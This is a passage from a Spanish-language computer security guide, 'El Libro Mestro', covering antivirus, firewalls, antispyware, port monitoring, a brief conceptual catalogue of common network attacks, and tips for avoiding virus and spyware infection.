necesario que se ejecute el programa infectado o se cumpla una determinada condicin. Es por esto por lo
que en algunas ocasiones, los efectos producidos por un virus, se aprecian tiempo despus de su ejecucin.
Los medios de entrada ms habituales para los virus son:
1. Las unidades de disco extrables (disquetes, CD-ROM, unidades ZIP, pendrives etc.)
2. Internet (navegando, mediante correo electrnico, al descargar archivos etc.)
3. Una red de ordenadores de una empresa en la que se comparten archivos de todo tipo, que si estn
infectados, pueden acabar extendindose por todos los equipos de la red.
Los archivos ms susceptibles de infectarse son los que se encuentran en un medio de almacenamiento
como los discos duros o disquetes. Ms concretamente sern infectados todos aquellos archivos, ficheros o
documentos que tengan la caracterstica de ser programas. A pesar de que estos son los mas normales,
tambin existen virus que se encargan de infectar ficheros que no son programas, como por ejemplo
ficheros que contienen macros. Estas macros son programas que el usuario puede incluir dentro de un
determinado tipo de archivos y que permiten la ejecucin de otros programas u otras rdenes que pueden
ser letales para nuestro equipo.

www.ale666.com


El Libro Mestro__________________________________________ - 98 -
Debido a todo esto, un antivirus es el sistema defensivo contra virus, gusanos, troyanos y otras amenazas
por antonomasia. Hoy en da un ordenador sin antivirus o con uno no actualizado, est expuesto a todo tipo
de ataques cuyos nefastos resultados van desde la prdida de datos vitales hasta el espionaje de todo lo que
hacemos con l.
Tener un antivirus se ha convertido en algo imprescindible para nuestro equipo, sobre todo si hablamos a
nivel empresarial, aunque cada vez se est usando ms a nivel personal, ya que el gasto que supone un
antivirus no es comparable a lo que nos puede suponer el recuperar los datos perdidos por culpa de un
virus.
Existe una amplia gama de modelos de antivirus entre los que elegir, y los precios son muy interesantes
debido a la competencia. Adems de los antivirus de pago, existen muchos otros antivirus gratuitos, que si
bien no tendrn una base de datos de virus tan amplia como los otros, ofrecen una excelente proteccin
contra muchos de los virus que circulan por la red.
De todas formas, elijamos un antivirus profesional o uno gratuito, lo importante es que nuestro ordenador
cuente con uno de estos programas, ya que siempre ser mejor que no contar con ningn sistema de
proteccin.

Estaremos an ms seguros bajo la vigilancia de dos antivirus, aunque antes de aventurarnos, debemos
informarnos de las incompatibilidades de unas marcas con otras.
Lo que nunca debemos hacer es tener ms de un antivirus activo, ya que podramos tener serios
problemas de seguridad e incluso colgar el ordenador.
Estas son algunas direcciones de programas antivirus donde podremos analizar nuestro equipo online,
probarlos, y si quedamos satisfechos comprarlos:
Trend micro
Bit Defender
Kaspersky
Norton
Mcafee
Panda
AVG Antivirus
Clam Win

2. Un cortafuegos o Firewall.

Cuando un ordenador accede a Internet se comunica mediante unas "puertas" llamadas puertos de
conexin. Existen 65.535 canales por donde los datos pueden salir o entrar en nuestro ordenador, de manera
que alguien puede intentar una intrusin por cualquiera de esos puertos. En realidad no es tan fcil la
intrusin porque si intentamos acceder a un ordenador por un puerto y ste no est escuchando (listening),
ser imposible. Pero Windows abre por defecto varios puertos que dejan nuestros ordenadores muy
vulnerables.

Un buen cortafuegos debe cerrar todos los puertos que no se estn usando e impedir cualquier conexin a
travs de ellos. Esto garantiza muchsimo nuestra seguridad.
Al contrario de lo indicado en los antivirus, nunca deben instalarse dos cortafuegos al mismo tiempo. La
www.ale666.com


El Libro Mestro__________________________________________ - 99 -
interferencia entre ambos puede ocasionar aperturas involuntarias de puertos que haran nuestro ordenador
ms inseguro.

Dos ejemplos de buenos cortafuegos son ZoneAlarm y Tiny, adems de los de Norton, Panda y Mcafee
mencionados anteriormente.
Funcionamiento de un Firewall
Un firewall consiste en un mecanismo basado en software o en hardware que se coloca entre dos redes,
normalmente entre una LAN e Internet, y que permite ciertas conexiones y bloquea otras siguiendo unas
reglas previamente configuradas.
Los firewalls como he comentado antes, pueden ser un programa especial que se instale en un PC, o bien
un dispositivo hardware que realice esa funcin o que incluso puede venir implementado en ciertos
dispositivos como los Routers.
Los firewalls personales como Zone Alarm, Tiny o BlackICE, son Firewalls basados en Software pero que
solo protegen a la mquina que lo tiene instalado. Estn diseados para pequeas redes o usuarios
individuales.
A nivel personal o de una pequea organizacin, si estos programas se complementan con otro tipo de
software como un antivirus, conseguiramos un nivel de seguridad ms que aceptable.
Realmente todos tienen la misma finalidad, que es bloquear cierto tipo de trfico en la red que se considera
inapropiado. A pesar de eso existen dos maneras de bloquear ese trfico, filtrando en la capa de red o en la
capa de aplicacin:
1. Un firewall de capa de red filtra los paquetes basndose en reglas predefinidas que indican
direcciones destino u origen y un nmero de puerto.
2. Un firewall basados en una aplicacin, acta como Proxy e impide el trfico entre dos redes pero
permite que ciertas aplicaciones del interior de la red sean accesibles a determinado software del exterior.
Si queremos ver un Firewall en funcionamiento, en este enlace hay un video que muestra el funcionamiento
de la red y cmo el Firewall acepta o rechaza los paquetes que le llegan segn se le hayan establecido las
reglas.

3. Un antispyware
El Spyware es un software espa creado con la finalidad de recoger informacin del usuario que lo tiene
instalado y, en la mayora de casos, sin que este usuario sea consciente de lo que est ocurriendo.
Existen varios tipos de spyware, por lo que los podemos llamar segn la funcin que realice su cdigo
malicioso:
- Adware: abren ventanas (pop-ups) en las que se muestra publicidad mientras ejecutamos aplicaciones.
- Spyware: pequeo programa que se instala en nuestro equipo para robar nuestros datos y espiar nuestros
movimientos por la red, recopilando datos sobre las webs que visitamos.
- Hijackers: programa que redirige el navegador de Internet a pginas de su eleccin secuestrando la
pgina de inicio o de bsqueda de nuestro navegador.
- Dialers: programa capaz de modificar el nmero de telfono con el que nos conectamos a nuestro ISP
(Proveedor de Servicios de Internet) para que llamemos a un nmero de tarificacin adicional con el coste
que eso supone. (906;806;807;etc).
Algunos se instalan automticamente sin nuestro consentimiento, no estn calificados como virus pero
invaden nuestra intimidad y hacen peligrar en la mayora de los casos la estabilidad del sistema y
especialmente el funcionamiento del navegador o el cliente de correo electrnico, e incluso pueden llegar a
recopilar informacin sobre nosotros y nuestro PC. Otros se instalan cuando descargamos extras para
www.ale666.com


El Libro Mestro__________________________________________ - 100 -
nuestro navegador como por ejemplo toolbars (barras de herramientas adicionales).

Hay ciertos programas que pueden recabar informacin de nuestros hbitos de navegacin para elaborar
complejas estadsticas de consumo, normalmente con fines comerciales.
La solucin para librarnos de esos programas que recogemos a veces de forma involuntaria cuando
instalamos un programa freeware, es instalar en nuestro ordenador un antispyware.

Existen algunos antivirus en el mercado que tambin detectan y eliminan esos programas spywares como
por ejemplo PER Antivirus, que adems de actualizar su base de datos de virus, tambin la actualiza con
los spywares y adwares, dndonos la opcin de eliminarlos si as lo deseamos.

Existen muchsimos programas que eliminan spyware, muchos de ellos especficos para alguno de ellos,
pero lo ideal es complementar a nuestro antivirus con un programa anti-spyware como Ad-aware o SpyBot
Search & Destroy, incluso sera conveniente tener instalados los 2, ya que hay veces en que lo que uno no
es capaz de eliminar, el otro s que puede, adems no dan problemas entre s como suceda con los antivirus
y su interfaz puede ponerse en castellano.
4. Un programa para eliminar huellas en Internet.

Para conseguir informacin de nuestros equipos, no es necesario que se nos instale ningn spyware,
simplemente al visitar determinadas Webs que tengan en su cdigo J ava, J avaScript, u otros lenguajes
como stos que tienen herramientas muy poderosas para saber datos nuestros.

Entre otras cosas, pueden obtener datos como nuestra IP, el tipo de navegador que utilizamos, el sistema
operativo que tenemos, nuestras direcciones de correo electrnico, cuntas pginas hemos visitado antes de
llegar a la pgina que nos espa, la direccin de al menos la ltima de esas pginas, el nmero de bits de
clave secreta para el cifrado mediante SSL ( protocolo que posibilita la transmisin cifrada y segura de
informacin a travs de la red), el tipo de monitor que usa, el nombre del ordenador, si pertenece a una red
corporativa o no, etc.

Si saben nuestro correo electrnico pueden usarlo para enviarnos spam (publicidad no solicitada) de
manera masiva. Adems, muchos usuarios hacen coincidir su direccin de correo electrnico o el nombre
de su PC con su nombre verdadero, por lo que de esta manera podran llegar a conocer nuestra direccin,
nmero de telfono etc.
Algunas pginas han sido capaces de obtener contraseas y otros datos relevantes simplemente robando
las cookies(documento de texto en el que se almacenan nuestras preferencias sobre ciertas webs y sobre la
conexin) almacenadas en nuestro disco duro.

Para evitar todo esto, es conveniente navegar a travs de un Proxy o con un programa especfico que
impida todo esto. Si utilizamos un Proxy, podemos tener problemas porque son muy inestables, lentifican
las conexiones y a veces no tendremos los permisos necesarios para utilizarlos.

Una opcin podra ser usar un anonimizador de navegacin como Anonymizer. Este programa es de pago,
aunque podemos usarlo en su versin gratuita, pero estaremos muy limitados porque habr pginas a las
que no podamos acceder.

Otro programa muy interesante para navegar seguros es Proxomitron , que elimina cdigo HTML
malicioso impidiendo entre otras cosas la aparicin las molestas ventanas de pop-ups, la ejecucin de
gusanos va Web, y lo mejor de todo es que no necesita instalarse, por lo que no tocar nada de la
configuracin de nuestro equipo ni del registro.


5. Un programa que monitorice los puertos.

Cuando accedemos a Internet en nuestro ordenador se abren conexiones con el exterior, y estas a su vez se
www.ale666.com


El Libro Mestro__________________________________________ - 101 -
establecen por un puerto determinado cada una.
Conociendo los puertos de cada aplicacin, podremos advertir cualquier anomala inmediatamente, porque
cuando nos infectamos con un troyano, ste debera abrir su correspondiente puerto y lo sabramos porque
el programa que monitoriza los puertos nos avisara.
En este link podemos ver un listado de puertos en el que nos explican cmo saber si tenemos algn troyano
en nuestro equipo y un listado de los puertos mas utilizados por los troyanos.
Estos programas nos pueden mostrar la IP del atacante, para as poder impedir que nuestro equipo se pueda
conectar con esa direccin mediante reglas del firewall o en este mismo programa.
Adems podramos saber dnde estn ubicados los servidores de las pginas Web que visitamos y el tipo de
conexin que establecen con nuestros ordenadores, con lo que tendramos controlado prcticamente el
100% del trfico de Internet.

Un interesante programa de este tipo es Visualookout, aunque existen muchos programas similares a ste.
Tipos de ataques ms comunes
A continuacin encontrareis un listado con los ataques ms comunes a los que nos enfrentamos diariamente
en Internet ordenado por tipos:
Escaneo (Bsqueda):
El escaneo, como mtodo de descubrir canales de comunicacin susceptibles de ser explotados, lleva en
uso mucho tiempo. La idea es escanear tantos puertos de escucha como sea posible, y guardar informacin
de aquellos que sean receptivos o de utilidad para cada necesidad en particular.
Existen diversos tipos de Scanning segn las tcnicas, puertos y protocolos explotados:
TCP connect scanning: forma bsica de escaneo de puertos TCP para encontrar puertos abiertos
por los que entrar.
TCP SYN scanning: simula una conexin cliente-servidor en la que se enva un paquete SYN, si
recibe respuesta, se corta la comunicacin y se registra ese puerto como abierto.
TCP FIN Scanning- Stealth Port Scanning: similar al anterior pero ms clandestino.
Fragmentation scanning: modificacin de los anteriores, pero fragmentando los paquetes.
Eavesdropping-packet snnifing: intercepta paquetes de la red sin modificarlos para, por
ejemplo, averiguar passwords.
Snooping downlading: igual que el anterior, pero adems intercepta archivos que pueden
descargar.
Ataques de autentificacin:
Este tipo de ataque tiene como objetivo engaar al sistema de la vctima para ingresar al mismo, para ello el
atacante hace suplantacin de la identidad. Generalmente este engao se realiza tomando las sesiones ya
establecidas por la vctima u obteniendo su nombre de usuario y password.
Spoofing-Looping: consiste en hacerse pasar por otra persona para luego tomar acciones en su
nombre. Existen varios tipos como el spoofing de IP, DNS, WEB etc.
Web Spoofing (Phising): el atacante crea un sitio Web falso similar al original, permitiendo
averiguar desde datos de la victima hasta claves de bancos.
IP Splicing-Hijacking: consiste en suplantar a un usuario autorizado cuando este se identifica.
Utilizacin de BackDoors: permite saltarse los mtodos normales de autentificacin.
www.ale666.com


El Libro Mestro__________________________________________ - 102 -
Utilizacin de Exploits: aprovechan fallos hardware o software para entrar en el sistema.
Obtencin de Passwords: obtencin de contraseas por prueba y error o mediante programas que
utilizan unos diccionarios con millones de claves que van probando hasta dar con la clave correcta.
Denial of service (DOS):
Los protocolos existentes actualmente fueron diseados para ser empleados en una comunidad abierta y
con una relacin de confianza mutua. La realidad indica que es ms fcil desorganizar el funcionamiento de
un sistema que acceder al mismo; as los ataques de Negacin de Servicio tienen como objetivo saturar los
recursos de la vctima de forma tal que se inhabilita los servicios brindados por la misma.
Jamming o Flooding: desactiva o satura los recursos del sistema, como memoria, disco, etc.
Syn Flood: se establece una conexin a medias, de manera que el equipo queda pendiente de
contestacin del equipo hostil, con lo que se ralentiza el sistema.
Connection Flood: hace que se supere el lmite de conexiones dejando colgado al servidor de
Internet.
Net Flood: satura la lnea con trfico malicioso, impidiendo el trfico til de la red.
Land Attack: consiste en mandar un paquete con la direccin y puerto de origen igual a la de
destino, con lo que el sistema acaba colgndose.
Supernuke o Winnuke: envo de paquetes manipulados al rango de puertos 137-139 que hace
que se cuelgue el equipo.
Teardrop I y II-Newtear-Bonk-Boink: impide que se puedan armar correctamente los
fragmentos que forman un paquete, haciendo que se sature el sistema.
E-Mail Bombing-Spamming: el primero consiste en saturar una cuenta de correo por el envo
masivo de un mismo mensaje, y el spamming lo que hace es un envo masivo de un mail a miles
de usuarios sin su consentimiento.
Ataques de modificacin-dao:
Tampering o Data Diddling: modificacin desautorizada de los datos o el software instalado en
el sistema vctima, incluyendo el borrado de archivos.
Borrado de Huellas: consiste en eliminar todas las tareas que realiz el intruso en el sistema para
impedir que sea localizado.
Ataques Mediante Java Applets: aprovecha fallos de seguridad de las Maquinas virtuales de
java para lanzar ataques.
Ataques Mediante JavaScript y VBscript: se usa para, por ejemplo, enviar correos sin el
conocimiento del usuario, lectura de directorios, archivos, ver el historial de paginas visitadas etc.
Ataques Mediante ActiveX: manipula el cdigo de ciertos exploradores, para que ste no solicite
confirmacin al usuario a la hora de descargar otro control activo de Internet, as pueden introducir
cdigo malicioso.
Ataques por Vulnerabilidades en los Navegadores: permite acceder al buffer del equipo y
ejecutar programas como por ejemplo format.com.
Explotacin de errores de diseo, implementacin y operacin:
www.ale666.com


El Libro Mestro__________________________________________ - 103 -
Muchos sistemas estn expuestos a "agujeros" de seguridad que son explotados para acceder a archivos,
contraseas, u obtener privilegios. Estas vulnerabilidades estn ocasionadas por fallos de programacin en
los sistemas operativos, aplicaciones de software, protocolos de red, navegadores de Internet, correo
electrnico, etc.
Recomendaciones para evitar el contagio de virus y spyware


1) Tener siempre activo un programa antivirus y un antispyware; lo recomendable es no confiar en uno
solo, pero usar ms de uno no significa que debamos tenerlos a todos instalados, simplemente ejecutamos
esos antivirus y antispywares en su opcin de escaneo, sobre la carpeta que contenga los archivos a revisar.
2) Igual de importante que el tener el antivirus instalado es tenerlo actualizado al mximo. Actualmente, las
actualizaciones son diarias en la mayora de los programas, o como mnimo semanales, por lo que si el
antivirus que tenemos no se actualiza con una frecuencia mxima de una semana, lo mejor sera cambiarnos
a otro que tuviese actualizaciones diarias o varias semanales.
Lo mismo ocurre con un programa antispyware, debemos tenerlo lo mas actualizado posible, ya que as se
corrigen agujeros de seguridad que pueden poner en riesgo nuestra seguridad.
Muchos gusanos en la actualidad tienen xito debido a la pereza de los usuarios a actualizar sus programas,
por lo que una conciencia de renovacin continua de los programas de nuestros ordenadores, en especial
aquellos ms delicados como navegadores, sistemas operativos, clientes de P2P y otros, es bsica para estar
seguros.
3) No abrir ningn mensaje ni archivo recibido a travs del correo electrnico de fuentes desconocidas o
muy poco conocidas. En el caso de personas conocidas, se deben tomar igualmente las precauciones
correspondientes. Asegurarse con esa persona del envo, y nunca ejecutarlos antes de pasar el antivirus
actualizado a estos archivos. Ante cualquier duda, simplemente se debe optar por borrar el mensaje y los
archivos adjuntos.

4) Estar informado de cmo operan los virus, y de las novedades sobre estos, alertas y anuncios crticos, en
la propia pgina Web del antivirus que tengamos instalado o en la direccin:
http://alerta-antivirus.red.es/portada/

5) No bajar nada de sitios Web de los que no tenga referencias de seriedad, o que no sean medianamente
conocidos. Y si se bajan archivos, debemos hacer como con los archivos adjuntos, examinarlos con el
antivirus antes de ejecutarlos o descargarlos.

6) Probar varios antivirus, firewalls, antispyware etc., descargando su versin trial (versin de prueba) que
suele durar entre 15 y 30 das, con lo que podremos probar varios antes de decidirnos por comprar el que
mas se adapte a nuestras necesidades.
Informarnos sobre su facilidad de uso y configuracin, soporte posventa, caractersticas y rendimiento.
Encontrar usuarios de esos programas que nos proporcionen su opinin sobre este u otros programas
similares. Lo mejor que podemos hacer es navegar en algn foro dedicado a seguridad o en los propios de
la empresa del programa, donde podremos leer detalles importantes de funcionamiento de la gente que lo
usa. stos incluso contestarn a las preguntas que les hagamos, y veremos las ventajas e inconvenientes de
los propios usuarios.










www.ale666.com


El Libro Mestro__________________________________________ - 104 -

SI encuentras algun link roto avisanos lo que no puedas descargar de la web original , lo podras
descargar de http://www.ale666.com

Si tienes consultas dirigete a nuestro Foro http://www.ale666.com/Foro o http://foro.ale666.com/
Este Libro Continuara






Gracias a todos los que colaboraron


www.ale666.com


El Libro Mestro__________________________________________ - 105 -










www.ale666.com